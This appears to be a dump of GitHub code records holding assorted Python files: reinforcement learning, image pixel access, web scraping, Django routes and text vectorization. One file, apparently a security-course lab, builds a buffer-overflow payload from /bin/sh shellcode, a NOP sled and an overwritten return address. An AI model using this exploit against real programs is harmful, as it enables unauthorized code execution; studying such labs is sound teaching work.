yi.shape[0]\n\nxx, yy = np.meshgrid(xi, yi)\nuu, vv = np.meshgrid(xi, yi)\n\nfor i in range(m):\n\n for j in range(xi.shape[0]):\n\n output = net.feedforward( np.array([xx[i, j], yy[i, j]]) )\n\n uu[i, j] = output[0] - xx[i, j]\n vv[i, j] = output[1] - yy[i, j]\n\n# interval bisection and newton\nf = DiffAE(net)\n\nu = Interval(0, 1)\nv = Interval(0, 1)\ninit = np.array([u, v])\nqueue = Queue()\nqueue.append(init)\n\nverified = interval_bisection(f, queue)\n\nfig, ax = plt.subplots(figsize=(12, 6))\n\n#ax.set_xlim([0, 1])\n#ax.set_ylim([0, 1])\n\nrectangles(ax, verified)\n\n# plot results\nx = data[0,:]\ny = data[1,:]\nax.scatter(x, y, s=marker_size/4, c='b', label='input')\nax.scatter(xo, yo, s=marker_size/4, c='g', label='output')\nq = ax.quiver(xx, yy, uu, vv, color='tab:gray')\n\nax.legend()\nplt.title('number of verified intervals = %d'%len(verified))\nax.set(xticklabels=[], yticklabels=[], xticks=[], yticks=[])\n\n# a very simple ode solver using Euler's method\ndef onclick(event):\n print('%s click: button=%d, x=%d, y=%d, xdata=%f, ydata=%f' %\n ('double' if event.dblclick else 'single', event.button,\n event.x, event.y, event.xdata, event.ydata))\n\n trace_x = [event.xdata]\n trace_y = [event.ydata]\n eps = 1\n h = 0.01\n while eps > 0.001:\n x_prev = np.array([trace_x[-1], trace_y[-1]])\n\n output = net.feedforward(x_prev)\n\n dx = output - x_prev\n\n x_curr = x_prev + h * dx\n\n trace_x.append(x_curr[0])\n trace_y.append(x_curr[1])\n\n eps = np.linalg.norm(dx)\n\n ax.plot(trace_x, trace_y, c='r')\n plt.show()\n\ncid = fig.canvas.mpl_connect('button_press_event', onclick)\nplt.show()\n#plt.savefig(f'./figures/quadratic/{file_name}_newton.png')\n","repo_name":"ajcook14/autoencoders","sub_path":"read_quadratic.py","file_name":"read_quadratic.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"25590276518","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 21 13:42:07 2023\r\n\r\n@author: clemm\r\n\"\"\"\r\nimport torch \r\nimport torch.nn as nn \r\nimport numpy as np \r\nimport random\r\nfrom collections import namedtuple, deque\r\nimport matplotlib.pyplot as plt \r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\nTransition = namedtuple('Transition',\r\n ('state', 'action', 'next_state', 'reward', 'dones'))\r\nclass Policy(nn.Module): \r\n def __init__(self, input_dim, output_dim):\r\n super(Policy, self).__init__()\r\n self.layers = nn.Sequential(nn.Linear(input_dim, 64),\r\n nn.Tanh(),\r\n nn.Linear(64,64),\r\n nn.Tanh(),\r\n nn.Linear(64, output_dim)) \r\n\r\n return \r\n \r\n def forward(self, x):\r\n out = self.layers(x)\r\n return out\r\n \r\nclass Replay(): \r\n def __init__(self, size): \r\n self.size = size \r\n self.memory = deque([], maxlen=size)\r\n \r\n return \r\n \r\n def store(self, episode): \r\n self.memory.append(episode)\r\n return \r\n \r\n def sample(self, batch_size): \r\n sample = random.sample(self.memory, batch_size)\r\n return sample\r\n \r\n \r\nclass DQN(): \r\n def __init__(self, env, gamma, lr, eps, batch, iters, use_memory, update_every): \r\n #discount factor\r\n self.gamma = gamma\r\n #learn rate\r\n self.learn_rate = lr\r\n #for epsilon greedy action selection and epsilon decay \r\n self.eps_start = eps \r\n self.eps = self.eps_start\r\n self.min_eps = 0.0\r\n \r\n #training hyperparameters\r\n self.iters = iters\r\n self.batch_size = batch \r\n self.use_memory = use_memory \r\n self.update = update_every \r\n \r\n #environment information \r\n self.env = env\r\n self.act_space = env.num_actions \r\n self.obs_space = env.num_states\r\n \r\n #initialize policy and target networks \r\n self.policy = Policy(self.obs_space, self.act_space)\r\n self.target = Policy(self.obs_space, self.act_space)\r\n #copy parameters of policy to the target network \r\n self.target.load_state_dict(self.policy.state_dict())\r\n self.target.eval()\r\n \r\n #initialize replay buffer \r\n if self.use_memory == True: \r\n self.memory = Replay(10000)\r\n else: \r\n #if buffer not in use, set max size = to batch size\r\n self.memory = Replay(self.batch_size)\r\n \r\n #optimizer and loss function \r\n self.opt = torch.optim.Adam(self.policy.parameters(), lr = self.learn_rate)\r\n self.loss_fun = nn.MSELoss()\r\n \r\n return \r\n \r\n def get_action(self, state): \r\n #get action from policy network \r\n with torch.no_grad(): \r\n action = self.policy(state).argmax(1)\r\n return action.item()\r\n \r\n def greedy_action(self, s): \r\n #epsilon greedy action selection \r\n with torch.no_grad():\r\n p = np.random.random()\r\n \r\n if p < self.eps: \r\n a = random.randrange(self.act_space)\r\n \r\n else: \r\n a = self.get_action(s)\r\n\r\n return a\r\n \r\n \r\n def update_model(self):\r\n #function to update the network model \r\n #sample batch from replay buffer\r\n batch = self.memory.sample(self.batch_size)\r\n batch = Transition(*zip(*batch))\r\n \r\n states = torch.cat([s.to(device) for s in batch.state])\r\n new_states = torch.cat([ns.to(device) for ns in batch.next_state])\r\n actions = torch.cat([a.to(device) for a in batch.action])\r\n rewards = torch.cat([r.to(device) for r in batch.reward])\r\n dones = torch.tensor(batch.dones).float()\r\n \r\n #calculate state-action values of current state\r\n Q = self.policy(states).gather(1, actions.unsqueeze(1))\r\n \r\n #calculate expected values of next states using target network \r\n next_values = (1-dones)*self.target(new_states).max(1)[0].detach()\r\n Q_tar = rewards + self.gamma*(next_values)\r\n \r\n loss = self.loss_fun(Q, Q_tar.unsqueeze(1))\r\n self.opt.zero_grad() \r\n loss.backward()\r\n torch.nn.utils.clip_grad_value_(self.policy.parameters(), 1)\r\n self.opt.step()\r\n \r\n \r\n\r\n def train(self):\r\n train_return = []\r\n\r\n step = 0\r\n for i in range(self.iters): \r\n s = self.env.reset()\r\n episode = deque([])\r\n s = torch.tensor(s).float().unsqueeze(0)\r\n ep_step = 0\r\n train_rew = 0\r\n for j in range(self.env.max_num_steps): \r\n #step through environment \r\n a = self.greedy_action(s)\r\n s_new, r, done = self.env.step(a)\r\n s_new = torch.tensor(s_new).float().unsqueeze(0)\r\n r = torch.tensor([r]).float()\r\n train_rew += r.item()\r\n a = torch.tensor([a])\r\n \r\n #store transition in replay buffer \r\n t = Transition(s, a, s_new, r, done)\r\n self.memory.store(t)\r\n s = s_new\r\n \r\n \r\n if len(self.memory.memory) < self.batch_size: \r\n #if there are not enough samples in memory, pass \r\n pass\r\n else: \r\n self.update_model()\r\n \r\n if done: \r\n break\r\n \r\n train_return.append(train_rew)\r\n \r\n \r\n #linear epsilon decay \r\n self.eps =np.max([self.min_eps, ((self.min_eps - self.eps_start)/(self.iters*.95))*i + self.eps_start])\r\n \r\n if i % self.update == 0: \r\n #copy policy parameters to target network \r\n self.target.load_state_dict(self.policy.state_dict())\r\n ''' \r\n fig, ax = plt.subplots()\r\n it = np.linspace(0, self.iters, self.iters)\r\n ax.plot(it, train_return)\r\n ax.set_ylim([-10, 100])\r\n '''\r\n return self.policy, train_return\r\n \r\n\r\n \r\n ","repo_name":"uiuc-ae598-rl-2023-spring/hw2-dqn-emmac4","sub_path":"Algorithm.py","file_name":"Algorithm.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12035065231","text":"# Python Program To Access Pixels Using OpenCV\n# Author:- Ajinkya Patil\n# Github:- https://github.com/Ajinkya7poppyi/\n\nimport cv2\n\n#Get pixel value at location\ndef get_pixel(row, col, index):\n\t#Check if image is 3-dimensional\n\tif index is not None:\n\t\t#Access value at input_img(row,col) in index space\n\t\tvalue = input_img[row, col, index]\n\telse:\n\t\t#Access value at input_img(row,col)\n\t\tvalue = input_img[row, col]\n\t\n\treturn value\t\n\t\n#Set pixel value at location\t\ndef set_pixel(row, col, index, value):\n\t#Check if image is 3-dimensional\n\tif index is not None:\n\t\t#Pass value to input_img(row,col) in index space\n\t\tinput_img[row, col, index] = value\n\telse:\n\t\t#Pass value to input_img(row,col)\n\t\tinput_img[row, col] = value\n\t\n#Path of image file to be read\nimage_read_path=\"H:/img.jpg\"\n\n#Window Name\nwindow_name=\"Input Image\"\n\n#Time to waitfor\nwait_time=0\n\n#Load an image\n#cv2.IMREAD_COLOR = Default flag for imread. Loads color image.\n#cv2.IMREAD_GRAYSCALE = Loads image as grayscale.\n#cv2.IMREAD_UNCHANGED = Loads image which have alpha channels.\n#cv2.IMREAD_ANYCOLOR = Loads image in any possible format\n#cv2.IMREAD_ANYDEPTH = Loads image in 16-bit/32-bit otherwise converts it to 8-bit\ninput_img = cv2.imread(image_read_path,cv2.IMREAD_UNCHANGED)\n\n#Check if image is loaded \nif input_img is not None:\n\t#Create a Window\n\t#cv2.WINDOW_NORMAL = Enables window to resize.\n\t#cv2.WINDOW_AUTOSIZE = Default flag. Auto resizes window size to fit an image.\n\tcv2.namedWindow(window_name,cv2.WINDOW_NORMAL)\n\t#Show image in window\n\tcv2.imshow(window_name,input_img)\n\t#Wait untill user enter any key\n\tcv2.waitKey(wait_time)\n\t#Destroy Window\n\tcv2.destroyWindow(window_name)\n\t\n\tprint (\"Hello, Welcome To Pixel Operations\")\n\t#Get the image dimesion in a tuple\n\timg_dimension= input_img.shape\n\t\n\tprint (\"Input image is \" + str(len(img_dimension)) + \" dimesional\") \n\tprint (\"Input Image rows: \" + str(img_dimension[0]) + \" cols: \" + str(img_dimension[1]))\n\t\n\t#Loop Forever\n\twhile True:\n\t\t#Ask User to choose operation\n\t\tprint (\"Choose Your Operation:\")\n\t\tprint (\"1. Get Pixel\")\n\t\tprint (\"2. Set Pixel\")\n\t\tprint (\"3. Exit\")\n\t\tchoice = None\t\n\t\t#Loops untill user enters valid number\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tchoice = int(input(\"Your Option: \"))\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tprint(\"Please Enter Valid Number\")\t\t\n\t\t\n\t\t#Exit from the while loop\n\t\tif choice == 3:\n\t\t\tbreak\n\t\t\n\t\t#Get data from user if valid operations\n\t\tif choice == 1 or choice == 2:\n\t\t\t#Get row from user\t\n\t\t\trow = None\n\t\t\t#Loops untill user enters valid number\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\trow = int(input(\"Enter Row:\"))\n\t\t\t\t\tbreak\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"Please Enter Valid Number\")\n\t\t\n\t\t\t#if user input is greater than actual rows set it to max rows value\n\t\t\tif row >= img_dimension[0]:\n\t\t\t\trow = img_dimension[0]-1\n\t\t\n\t\t\t#Get col from user\n\t\t\tcol = None\n\t\t\t#Loops untill user enters valid number\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\trow = int(input(\"Enter Column:\"))\n\t\t\t\t\tbreak\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"Please Enter Valid Number\")\n\t\t\t#if user input is greater than actual cols set it to max cols value\n\t\t\tif col >= img_dimension[1]:\n\t\t\t\tcol = img_dimension[1]-1\n\t\t\n\t\t\t#Set indx to None considering 2 dimensional image\n\t\t\tindx = None\n\t\n\t\t\t#If image has more than 2 dimensions\n\t\t\tif len(img_dimension) > 2:\n\t\t\t\t#Get index from user\n\t\t\t\t#Loops untill user enters valid number\n\t\t\t\twhile True:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tindx = int(input(\"Enter Index:\"))\n\t\t\t\t\t\tbreak\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"Please Enter Valid Number\")\n\t\t\t\t#if user input is greater than actual indices set it to max index value\n\t\t\t\tif indx >= img_dimension[2]:\n\t\t\t\t\tindx = img_dimension[2]-1\n\t\n\t\t#if user choose to get value\n\t\tif choice == 1:\n\t\t\tprint (\"Value is \" + str(get_pixel(row, col, indx)))\n\t\t\n\t\t#if user choose to set value\n\t\telif choice == 2:\n\t\t\tval = None\n\t\t\t#Get value to et from user\n\t\t\t#Loops untill user enters valid number\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\tval = int(input(\"Enter Value:\"))\n\t\t\t\t\tbreak\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"Please Enter Valid Number\")\n\t\t\t#call set_pixel function\n\t\t\tset_pixel(row, col, indx, val)\n\t\t\t#Create a Window\n\t\t\tcv2.namedWindow(window_name,cv2.WINDOW_NORMAL)\n\t\t\t#Show image in window\n\t\t\tcv2.imshow(window_name,input_img)\n\t\t\t#Wait untill user enter any key\n\t\t\tcv2.waitKey(wait_time) \n\t\t\t#Destroy Window\n\t\t\tcv2.destroyWindow(window_name)\n\t\t\t\n\t\telse:\n\t\t\tprint (\"Please Select A Valid Operation\")\nelse:\n\tprint (\"Please Check The Path of Input File\")","repo_name":"Ajinkya7poppyi/ImageProcessing","sub_path":"Access_Pixels/access_pixels.py","file_name":"access_pixels.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"582976704","text":"\n\n\nimport requests\nimport time\n\nfrom bs4 import BeautifulSoup\nimport smtplib\nimport email.mime\nimport datetime\n\n\n\nimport requests\nimport pyttsx3\nimport bs4\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n\ntext_speech = pyttsx3.init()\nimport time \n\nfor i in range(60):\n headers = {\n 'User-Agent':\"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Mobile Safari/537.36 Edg/94.0.992.31'\"\n }\n \n url = \"https://www.bbc.com/weather/your-city-id\" #Enter the weather link of the city that needs to be checked \n t = time.localtime()\n current_hr = time.strftime(\"%H:%M\", t)\n text_speech.say(current_hr)\n text_speech.runAndWait()\n cnt5=''\n cnt6=''\n cnt1 =''\n r = requests.get(url,{'headers':headers})\n soup = bs4.BeautifulSoup(r.text,\"html.parser\")\n tag = soup.find('h1', attrs={\"id\": \"wr-location-name-id\"})\n cnt1+=tag.text\n tag = soup.find('span', attrs={\"class\": \"wr-value--temperature--c\"})\n cnt5+=tag.text\n tag = soup.find('div', attrs={\"class\": \"wr-day__weather-type-description wr-js-day-content-weather-type-description wr-day__content__weather-type-description--opaque\"})\n cnt6+=tag.text\n final = \"The temperature is \"+ cnt5 + \" now\"\n text_speech.say(cnt1)\n text_speech.runAndWait()\n text_speech.say(final)\n text_speech.runAndWait()\n text_speech.say(cnt6)\n text_speech.runAndWait()\n print(current_hr)\n time.sleep(600) #no of minutes \n \n","repo_name":"rubenskx/weather_text_scraping","sub_path":"web_scripting_newloop.py","file_name":"web_scripting_newloop.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"14390483030","text":"# To run the shell code in python\nshellcode= (\n\"\\x31\\xc0\" # xorl %eax,%eax\n\"\\x50\" # pushl %eax\n\"\\x68\"\"//sh\" # pushl $0x68732f2f\n\"\\x68\"\"/bin\" # pushl $0x6e69622f\n\"\\x89\\xe3\" # movl %esp,%ebx\n\"\\x50\" # pushl %eax\n\"\\x53\" # pushl %ebx\n\"\\x89\\xe1\" # movl %esp,%ecx\n\"\\x99\" # cdq\n\"\\xb0\\x0b\" # movb $0x0b,%al\n\"\\xcd\\x80\" # int $0x80\n).encode('latin-1')\n\n# ------------------------ GNU DEBUGGER PARAMETERS --------------------\n\n\n# ----------------- Our parameters ------------------------\n\n# Paramaters\nFILE_SIZE = 900 # EXAMPLE, Here, file size is 300 bytes\nBUFFER_SIZE = 400 # Here, the buffer size is 100 bytes\n\n# Addresses Calculation\nEBP = 0xbfffec18\nBUFFER = 0xbfffea7c\nDIFFERENCE = EBP - BUFFER\nADDITION_TO_EBP = DIFFERENCE + 8 + 87 # Total:507 is added\n\n# print(\"DIFFERENCE = \" + str(DIFFERENCE))\n\n\n# --------------------- Crafting the bad file begins -------------------\nBAD_FILE_NAME = \"input\"\n\n# Store things in the array named \"contents_badFile\"\n\n# 1. We make the WHOLE file as NOP instruction [0x90 instruction]\ncontents_badFile = bytearray(0x90 for i in range(FILE_SIZE))\n\n# 2. We make the last part of contents_badFile as the shellcode\n\nstarting_idx_shellcode = FILE_SIZE - len(shellcode) # 2.1 Obtain the starting index of the shell code = len(full_file) - len(shell_code)\ncontents_badFile[starting_idx_shellcode:FILE_SIZE] = shellcode # 2.2 Fill from start_idx_shellcode:endOfFile as the shellcode\n\n# 3. Obtain the the return address of where to point to (inside NOP region) ...\nreturnAddressOfNOPRegion = EBP + ADDITION_TO_EBP\ncontents_badFile[DIFFERENCE+4:DIFFERENCE+8] = (returnAddressOfNOPRegion).to_bytes(4,byteorder='little')\n\n\n# 4. Write to the output file\n#write\nwith open(BAD_FILE_NAME,'wb') as f:\n f.write(contents_badFile)\n","repo_name":"Mahim1997/Assignments-Github","sub_path":"Security Sessional/Practice_BufferOverflow/ONLINE Practice on Sunday/myExploit.py","file_name":"myExploit.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9899649089","text":"import urllib.request\nfrom urllib.request import Request\nfrom random import randint\nfrom bs4 import BeautifulSoup\nfrom miscellanea.logging import FakeTestLogger\nfrom ml.text.StringCleaner import StringCleaner\nfrom miscellanea.RequestHeaderGenerator import RequestHeaderGenerator\n\n\nclass FactycomuaParser:\n\n def __init__(self, app_logger):\n self.logger = app_logger\n\n def parse(self, url):\n try:\n headers = RequestHeaderGenerator.get_headers()\n request = Request(url, headers=headers)\n content = urllib.request.urlopen(request).read().decode('utf-8')\n soup = BeautifulSoup(content, 'html5lib')\n\n article_text = \"\"\n\n paragraphs = soup.findAll(\"h1\")\n for element in paragraphs:\n article_text += \"\\n\" + str(element.text)\n\n paragraphs = soup.findAll(\"div\", {\"class\": \"kv-post-content-text\"})\n for element in paragraphs:\n for el in element:\n if hasattr(el, \"text\") & hasattr(el, \"name\"):\n if el.name == 'p':\n article_text += \"\\n\" + str(el.text)\n except Exception as e:\n message = self.logger.make_message_link(\"FactycomuaParser\", e, url)\n self.logger.write_message(message)\n return 0, \"\"\n article_text = StringCleaner.clean(article_text)\n return 1, article_text\n\n\nif __name__ == \"__main__\":\n logger = FakeTestLogger.FakeTestLogger()\n my_parser = FactycomuaParser(logger)\n # success, article = my_parser.parse('https://fakty.com.ua/ua/proisshestvija/20190203-pozhezha-na-lisovij-ye'\n # '-zagroza-obvalu-konstruktsij/')\n success, article = my_parser.parse('https://fakty.com.ua/ua/ukraine/20191206-v-ukrayini-vvedut-systemu-kontrolyu-nad-inozemnymy-investytsiyamy-v-opk-mzs/')\n print(article)\n","repo_name":"raiyin/spiderstat","sub_path":"gather/parsing/Ukraine/FactycomuaParser.py","file_name":"FactycomuaParser.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"36501325394","text":"# coding: utf-8\nfrom django.conf.urls import url\nfrom phone import views\n\nurlpatterns = [\n url(r'^test/$', views.test, name='test'),\n url(r'^openid/$', views.openid, name='openid'),\n\n url(r'^sendcode/(?P[01])/(?P[01])/$', views.sendcode, name='sendcode'),\n url(r'^registe/(?P[12])/$', views.registe, name='registe'),\n url(r'^login/$', views.login_, name='login'),\n url(r'^resetpasswd/$', views.resetpasswd, name='resetpasswd'),\n url(r'^modifypasswd/$', views.modifypasswd, name='modifypasswd'),\n url(r'^logout/$', views.logout, name='logout'),\n\n\n url(r'^name/$', views.name, name='name'),\n url(r'^userinfo/$', views.userinfo, name='userinfo'),\n url(r'^leftslide/$', views.leftslide, name='leftslide'),\n url(r'^photo/$', views.photo, name='photo'),\n url(r'^bg/$', views.bg, name='bg'),\n url(r'^nickname/$', views.nickname, name='nickname'),\n url(r'^company/$', views.company, name='company'),\n url(r'^position/$', views.position, name='position'),\n url(r'^addr/$', views.addr, name='addr'),\n url(r'^weixin/$', views.weixin, name='weixin'),\n \n url(r'^hasinform', views.hasinform, name='hasinform'), # lindyang\n url(r'^hastopic/$', views.hastopic, name='hastopic'),\n\n url(r'^inform/(?P\\d+)/$', views.inform, name='inform'),\n url(r'^readinform(?P[1-9]\\d*)/$', views.readinform, name='readinform'),\n\n url(r'^home/$', views.home, name='home'),\n url(r'^customservice/$', views.customservice, name='customservice'),\n url(r'^credit/$', views.credit, name='credit'),\n \n url(r'^cursor/$', views.cursor, name='cursor'),\n url(r'^project/(?P[01234])/(?P\\d+)/$', views.project, name='project'),\n\n url(r'^auth/$', views.auth, name='auth'),\n url(r'^authpersonoptional/$', views.authpersonoptional, name='authpersonoptional'),\n url(r'^myauth/$', views.myauth, name='myauth'),\n\n url(r'^like/(?P[1-9]\\d*)/(?P[01])/$', views.projectlike, name='projectlike'),\n url(r'^uploadlike/(?P[1-9]\\d*)/(?P[01])/$', views.uploadlike, name='uploadlike'),\n url(r'^collect/(?P[1-9]\\d*)/(?P[01])/$', views.projectcollect, name='projectcollect'),\n url(r'^uploadcollect/(?P[1-9]\\d*)/(?P[01])/$', views.uploadcollect, name='uploadcollect'),\n url(r'^collectfinance/(?P\\d+)/$', views.collectfinance, name='collectfinance'),\n url(r'^collectfinancing/(?P\\d+)/$', views.collectfinancing, name='collectfinancing'),\n url(r'^collectfinanced/(?P\\d+)/$', views.collectfinanced, name='collectfinanced'),\n url(r'^collectupload/(?P\\d+)/$', views.collectupload, name='collectupload'),\n\n\n\n url(r'^upload/$', views.upload, name='upload'),\n\n url(r'^newstype/$', views.newstype, name='newstype'),\n url(r'^news/(?P[1-9]\\d*)/(?P\\d+)/$', views.news, name='news'),\n url(r'^newsread/(?P[1-9]\\d*)/$', views.newsread, name='newsread'),\n url(r'^newsshare/(?P[1-9]\\d*)/$', views.newsshare, name='newsshare'),\n url(r'^newssearch/(?P\\d+)/$', views.newssearch, name='newssearch'),\n url(r'^sharenews/(?P[1-9]\\d*)/$', views.sharenews, name='sharenews'),\n\n url(r'^feeling/(?P\\d+)/$', views.feeling, name='feeling'),\n\n url(r'^wantinvest/(?P[1-9]\\d*)/(?P[01])/$', views.wantinvest, name='wantinvest'),\n\n url(r'^projectdetail/(?P[1-9]\\d*)/$', views.projectdetail, name='projectdetail'),\n url(r'^uploaddetail/(?P[1-9]\\d*)/$', views.uploaddetail, name='uploaddetail'),\n url(r'^financeplan/(?P[1-9]\\d*)/$', views.financeplan, name='financeplan'),\n url(r'^member/(?P[1-9]\\d*)/$', views.member, name='member'),\n url(r'^investlist/(?P[1-9]\\d*)/$', views.investlist, name='investlist'),\n url(r'^attend/(?P[1-9]\\d*)/$', views.attend, name='attend'),\n\n url(r'^investor/(?P[012])/(?P\\d+)/$', views.investor, name='investor'),\n url(r'^authdetail/(?P[1-9]\\d*)/$', views.authdetail, name='authdetail'),\n url(r'^institutedetail/(?P[1-9]\\d*)/$', views.institutedetail, name='institutedetail'),\n\n url(r'^thinktank/(?P\\d+)/$', views.thinktank, name='thinktank'),\n url(r'^thinktankdetail/(?P[1-9]\\d*)/$', views.thinktankdetail, name='thinktankdetail'),\n\n url(r'^feedback/$', views.feedback, name='feedback'),\n url(r'^keyword/$', views.keyword, name='keyword'),\n url(r'^projectsearch/(?P\\d+)/$', views.projectsearch, name='projectsearch'),\n url(r'^userinfo/((?P[1-9]\\d*)/)?$', views.userinfo, name='userinfo'),\n url(r'^myupload/(?P\\d+)/$', views.myupload, name='myupload'),\n url(r'^myinvest/(?P\\d+)/$', views.myinvest, name='myinvest'),\n\n url(r'^token/$', views.token, name='token'),\n url(r'^callback/$', views.callback, name='callback'),\n url(r'^delvideo/$', views.delvideo, name='delvideo'),\n url(r'^ismyproject/(?P[1-9]\\d*)/$', views.ismyproject, name='ismyproject'),\n url(r'^valsession/$', views.valsession, name='valsession'),\n url(r'^checkupdate/(?P[12])/$', views.checkupdate, name='checkupdate'),\n url(r'^shareproject/(?P[1-9]\\d*)/$', views.shareproject, name='shareproject'),\n url(r'^shareapp/$', views.shareapp, name='shareapp'),\n\n url(r'^aboutroadshow', views.aboutroadshow, name='aboutroadshow'),\n url(r'^risk/$', views.risk, name='risk'),\n url(r'^useragreement/$', views.useragreement, name='useragreement'),\n url(r'^projectprotocol/$', views.projectprotocol, name='projectprotocol'),\n url(r'^crowfunding/$', views.crowfunding, name='crowfunding'),\n url(r'^leadfunding/$', views.leadfunding, name='leadfunding'),\n url(r'^privacy/$', views.privacy, name='privacy'),\n\n url(r'^topic/(?P[1-9]\\d*)/$', views.topic, name='topic'),\n url(r'^topiclist/(?P[1-9]\\d*)/(?P\\d+)/$', views.topiclist, name='topiclist'),\n url(r'^mytopiclist/(?P\\d+)/$', views.mytopiclist, name='mytopiclist'),\n url(r'^readtopic/(?P\\d+)/$', views.readtopic, name='readtopic'),\n\n url(r'^latestnewscount/$', views.latestnewscount, name='latestnewscount'),\n url(r'^getfeeling/(?P[1-9]\\d*)/$', views.getfeeling, name='getfeeling'),\n url(r'^postfeeling/$', views.postfeeling, name='postfeeling'),\n url(r'^deletefeeling/(?P[1-9]\\d*)/$', views.deletefeeling, name='deletefeeling'),\n url(r'^likefeeling/(?P[1-9]\\d*)/(?P[01])/$', views.likefeeling, name='likefeeling'),\n url(r'^feelinglikers/(?P[1-9]\\d*)/(?P\\d+)/$', views.feelinglikers, name='feelinglikers'),\n url(r'^feelingcomment/(?P[1-9]\\d*)/(?P\\d+)/$', views.feelingcomment, name='feelingcomment'),\n url(r'^postfeelingcomment/(?P[1-9]\\d*)/$', views.postfeelingcomment, name='postfeelingcomment'),\n url(r'^hidefeelingcomment/(?P[1-9]\\d*)/$', views.hidefeelingcomment, name='hidefeelingcomment'),\n url(r'^background/$', views.background, name='background'),\n]\n","repo_name":"lindyang/software1.0","sub_path":"phone/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10132931269","text":"import ctypes\nfrom ctypes import Structure, c_float, c_uint32, c_uint16, sizeof, c_bool, c_int, c_void_p\nimport numpy as np\n\nfrom loguru import logger\n\nfrom crunge import wgpu\nfrom crunge.core import as_capsule\nfrom crunge.wgpu import BackendType\n\n\n\nindices = np.array([0, 1, 2, 3, 7, 1, 5, 0, 4, 2, 6, 7, 4, 5,], dtype=np.uint16)\ndata = as_capsule(indices)\n#size = len(indices) * sizeof(c_uint16)\nsize = indices.nbytes\nlogger.debug(size)\nusage = wgpu.BufferUsage.INDEX\n\ndef main():\n instance = wgpu.create_instance()\n adapter = instance.request_adapter()\n props = wgpu.AdapterProperties()\n adapter.get_properties(props)\n logger.debug(props.vendor_name)\n device = adapter.create_device()\n logger.debug(device)\n device.enable_logging()\n\n descriptor = wgpu.BufferDescriptor()\n descriptor.size = size\n descriptor.usage = usage | wgpu.BufferUsage.COPY_DST\n buffer: wgpu.Buffer = device.create_buffer(descriptor)\n\n device.queue.write_buffer(buffer, 0, data, size)\n\nif __name__ == \"__main__\":\n main()","repo_name":"crungelab/crunge","sub_path":"pkg/wgpu/tests/test_buffer.py","file_name":"test_buffer.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"15854397224","text":"#importing libraries\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport re\r\nimport nltk\r\n\r\n#import dataset\r\ndataset = pd.read_csv('news.csv')\r\n\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import SnowballStemmer\r\n\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nstop_words =set(stopwords.words('english'))\r\n\r\nheadline = dataset['headline']\r\ntext = dataset['text']\r\n#storing cleaned text reviews\r\ncleaned_text =[]\r\n#storing cleaned headline\r\ncleaned_headline = []\r\nfor j in range(len(headline)):\r\n #this is for the headline\r\n summary = headline[j]\r\n #this is for the text\r\n summary1 = text[j]\r\n #Cleaning the reviews using re, removing pos tags\r\n clnr = re.compile('<.*?>')\r\n summary = re.sub(clnr, ' ' , summary)\r\n summary1 = re.sub(clnr, ' ' , summary1)\r\n #Cleaning the reviews keeping only Alphabets\r\n clnr = re.compile('[^a-zA-Z]')\r\n summary = re.sub(clnr, ' ' , summary)\r\n summary1 = re.sub(clnr, ' ' , summary1)\r\n \r\n summary = summary.lower()\r\n summary1 = summary1.lower()\r\n \r\n summary = nltk.word_tokenize(summary)\r\n summary1 = nltk.word_tokenize(summary1)\r\n \r\n SS = SnowballStemmer('english')\r\n lmt = WordNetLemmatizer()\r\n \r\n summary = [SS.stem(i) for i in summary if not i in stop_words]\r\n summary = [lmt.lemmatize(i) for i in summary]\r\n \r\n summary = ' '.join(summary)\r\n \r\n summary1 = [SS.stem(i) for i in summary1 if not i in stop_words]\r\n \r\n summary1 = [lmt.lemmatize(i) for i in summary1]\r\n summary1 = ' '.join(summary)\r\n \r\n print(j , ' done..')\r\n cleaned_headline.append(summary1)\r\n cleaned_text.append(summary)\r\n\r\n#tf-idf vectorization\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\n\r\nvectorise = TfidfVectorizer(use_idf=True)\r\nvectorizer = vectorise.fit_transform(cleaned_text,cleaned_headline).toarray()\r\n\r\n#Scaling the vector\r\nfrom sklearn.preprocessing import StandardScaler\r\nss = StandardScaler()\r\ndata = ss.fit_transform(vectorizer)\r\n\r\n#Reducing the dimensions to avoid overfit\r\nfrom sklearn.decomposition import PCA\r\npca = PCA (n_components = 2)\r\nx = 